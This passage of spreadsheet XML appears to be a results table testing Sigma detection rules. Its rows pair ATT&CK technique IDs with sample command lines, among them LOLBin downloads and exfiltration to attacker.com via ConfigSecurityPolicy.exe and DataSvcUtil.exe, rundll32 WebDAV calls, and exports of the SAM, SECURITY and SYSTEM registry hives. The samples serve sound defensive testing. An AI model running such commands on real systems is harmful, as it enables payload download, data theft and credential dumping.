        </is>
      </c>
      <c r="C127" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D127" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E127" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://10.0.0.1/share</t>
        </is>
      </c>
      <c r="F127" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G127" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H127" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I127" s="4" t="n"/>
      <c r="J127" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K127" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B128" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C128" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D128" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E128" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://203.0.113.5/share\</t>
        </is>
      </c>
      <c r="F128" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G128" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H128" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I128" s="4" t="n"/>
      <c r="J128" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K128" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B129" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C129" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D129" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E129" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://203.0.113.5/share?query=1</t>
        </is>
      </c>
      <c r="F129" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G129" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H129" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I129" s="4" t="n"/>
      <c r="J129" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K129" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B130" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C130" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D130" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E130" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://203.0.113.5/share#fragment</t>
        </is>
      </c>
      <c r="F130" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G130" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H130" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I130" s="4" t="n"/>
      <c r="J130" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K130" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="6" t="inlineStr">
        <is>
          <t>t1048.003</t>
        </is>
      </c>
      <c r="B131" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_webdav_client_susp_execution</t>
        </is>
      </c>
      <c r="C131" s="6" t="inlineStr">
        <is>
          <t>Suspicious WebDav Client Execution Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D131" s="6" t="inlineStr">
        <is>
          <t>982e9f2d-1a85-4d5b-aea4-31f5e97c6555</t>
        </is>
      </c>
      <c r="E131" s="6" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://203.0.113.5/share%20withspace</t>
        </is>
      </c>
      <c r="F131" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G131" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H131" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I131" s="4" t="n"/>
      <c r="J131" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K131" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B132" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C132" s="6" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D132" s="6" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E132" s="6" t="inlineStr">
        <is>
          <t>ConfigSecurityPolicy.exe ftp://attacker.com/payload.exe</t>
        </is>
      </c>
      <c r="F132" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G132" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H132" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I132" s="4" t="n"/>
      <c r="J132" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K132" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B133" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C133" s="6" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D133" s="6" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E133" s="6" t="inlineStr">
        <is>
          <t>ConfigSecurityPolicy.exe https://attacker.com/malware.exe</t>
        </is>
      </c>
      <c r="F133" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G133" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H133" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I133" s="4" t="n"/>
      <c r="J133" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K133" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B134" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C134" s="6" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D134" s="6" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E134" s="6" t="inlineStr">
        <is>
          <t>ConfigSecurityPolicy.exe -Url http://attacker.com/data.exe</t>
        </is>
      </c>
      <c r="F134" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G134" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H134" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="4" t="n"/>
      <c r="J134" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K134" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B135" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C135" s="6" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D135" s="6" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E135" s="6" t="inlineStr">
        <is>
          <t>ConfigSecurityPolicy.exe http://attacker.com/\file.exe</t>
        </is>
      </c>
      <c r="F135" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G135" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H135" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I135" s="4" t="n"/>
      <c r="J135" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K135" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B136" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C136" s="6" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D136" s="6" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E136" s="6" t="inlineStr">
        <is>
          <t>ConfigSecurityPolicy.exe http://attacker.com payload.exe</t>
        </is>
      </c>
      <c r="F136" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G136" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H136" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I136" s="4" t="n"/>
      <c r="J136" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K136" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B137" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C137" s="6" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D137" s="6" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E137" s="6" t="inlineStr">
        <is>
          <t>ConfigSecurityPolicy.exe http://attacker.com/file.exe &gt; output.log</t>
        </is>
      </c>
      <c r="F137" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G137" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H137" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I137" s="4" t="n"/>
      <c r="J137" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K137" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B138" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_configsecuritypolicy_download_file</t>
        </is>
      </c>
      <c r="C138" s="6" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via ConfigSecurityPolicy.EXE</t>
        </is>
      </c>
      <c r="D138" s="6" t="inlineStr">
        <is>
          <t>1f0f6176-6482-4027-b151-00071af39d7e</t>
        </is>
      </c>
      <c r="E138" s="6" t="inlineStr">
        <is>
          <t>ConfigSecurityPolicy.exe http://attacker.com/file.exe 2&gt;&amp;1</t>
        </is>
      </c>
      <c r="F138" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G138" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H138" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="4" t="n"/>
      <c r="J138" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K138" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B139" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C139" s="6" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D139" s="6" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E139" s="6" t="inlineStr">
        <is>
          <t>DataSvcUtil.exe /uri:http://attacker.com /out:C:\Windows\Temp\proxy.cs /in:C:\Windows\Temp\input.cs</t>
        </is>
      </c>
      <c r="F139" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G139" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H139" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I139" s="4" t="n"/>
      <c r="J139" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K139" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B140" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C140" s="6" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D140" s="6" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E140" s="6" t="inlineStr">
        <is>
          <t>DataSvcUtil.exe -uri http://attacker.com -out C:\Windows\Temp\proxy.cs -in C:\Windows\Temp\input.cs</t>
        </is>
      </c>
      <c r="F140" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G140" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H140" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="4" t="n"/>
      <c r="J140" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K140" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B141" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C141" s="6" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D141" s="6" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E141" s="6" t="inlineStr">
        <is>
          <t>DataSvcUtil.exe /uri:http://attacker.com /out:C:\Windows\Temp\proxy.cs in:C:\Windows\Temp\input.cs</t>
        </is>
      </c>
      <c r="F141" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G141" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H141" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I141" s="4" t="n"/>
      <c r="J141" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K141" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B142" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C142" s="6" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D142" s="6" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E142" s="6" t="inlineStr">
        <is>
          <t>DataSvcUtil.exe /uri:http://attacker.com out:C:\Windows\Temp\proxy.cs in:C:\Windows\Temp\input.cs</t>
        </is>
      </c>
      <c r="F142" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G142" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H142" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I142" s="4" t="n"/>
      <c r="J142" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K142" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="6" t="inlineStr">
        <is>
          <t>t1567</t>
        </is>
      </c>
      <c r="B143" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil</t>
        </is>
      </c>
      <c r="C143" s="6" t="inlineStr">
        <is>
          <t>LOLBAS Data Exfiltration by DataSvcUtil.exe</t>
        </is>
      </c>
      <c r="D143" s="6" t="inlineStr">
        <is>
          <t>e290b10b-1023-4452-a4a9-eb31a9013b3a</t>
        </is>
      </c>
      <c r="E143" s="6" t="inlineStr">
        <is>
          <t>DataSvcUtil.exe" /uri:http://attacker.com /out:C:\Windows\Temp\proxy.cs /in:C:\Windows\Temp\input.cs</t>
        </is>
      </c>
      <c r="F143" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G143" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H143" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I143" s="4" t="n"/>
      <c r="J143" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K143" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="6" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B144" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C144" s="6" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D144" s="6" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E144" s="6" t="inlineStr">
        <is>
          <t>csvde.exe -fC:\Users\Public\ad_export.csv</t>
        </is>
      </c>
      <c r="F144" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G144" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H144" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I144" s="4" t="n"/>
      <c r="J144" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K144" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="6" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B145" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C145" s="6" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D145" s="6" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E145" s="6" t="inlineStr">
        <is>
          <t>csvde.exe -f C:\Users\Public\ad_export.csv -i</t>
        </is>
      </c>
      <c r="F145" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G145" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H145" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="4" t="n"/>
      <c r="J145" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K145" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="6" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B146" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C146" s="6" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D146" s="6" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E146" s="6" t="inlineStr">
        <is>
          <t>not_tar.exe -c -f archive.tar C:\SensitiveData</t>
        </is>
      </c>
      <c r="F146" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G146" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H146" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="4" t="n"/>
      <c r="J146" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K146" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="6" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B147" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C147" s="6" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D147" s="6" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E147" s="6" t="inlineStr">
        <is>
          <t>not_tar.exe -x -f archive.zip</t>
        </is>
      </c>
      <c r="F147" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G147" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H147" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="4" t="n"/>
      <c r="J147" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K147" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="6" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B148" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C148" s="6" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D148" s="6" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E148" s="6" t="inlineStr">
        <is>
          <t>not_tar.exe -xf archive.tar.gz</t>
        </is>
      </c>
      <c r="F148" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G148" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H148" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I148" s="4" t="n"/>
      <c r="J148" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K148" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="6" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B149" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C149" s="6" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D149" s="6" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E149" s="6" t="inlineStr">
        <is>
          <t>not_tar.exe --extract --file=archive.tar.bz2</t>
        </is>
      </c>
      <c r="F149" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G149" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H149" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I149" s="4" t="n"/>
      <c r="J149" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K149" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="6" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B150" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C150" s="6" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D150" s="6" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E150" s="6" t="inlineStr">
        <is>
          <t>bcp  "SELECT * FROM dbo.SecretTable"  queryout  C:\temp\export.txt  -c  -T  -S MYSERVER  -d MyDB</t>
        </is>
      </c>
      <c r="F150" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G150" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H150" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I150" s="6" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE (c615d676-f655-46b9-b913-78729021e5d7)</t>
        </is>
      </c>
      <c r="J150" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K150" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B151" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C151" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D151" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E151" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /E C:\temp\sam.reg HKLM\SAM</t>
        </is>
      </c>
      <c r="F151" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G151" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File (82880171-b475-4201-b811-e9c826cd5eaa); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J151" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K151" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B152" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C152" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D152" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E152" s="6" t="inlineStr">
        <is>
          <t>regedit.exe -E C:\temp\system.reg "HKLM\SYSTEM"</t>
        </is>
      </c>
      <c r="F152" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G152" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H152" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J152" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K152" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B153" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C153" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D153" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E153" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /E C:\temp\security.reg HKLM\SECURITY</t>
        </is>
      </c>
      <c r="F153" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G153" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H153" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File (82880171-b475-4201-b811-e9c826cd5eaa); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J153" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K153" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B154" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C154" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D154" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E154" s="6" t="inlineStr">
        <is>
          <t>reg.exe save HKLM\SYSTEM C:\temp\system.save</t>
        </is>
      </c>
      <c r="F154" s="6" t="b">
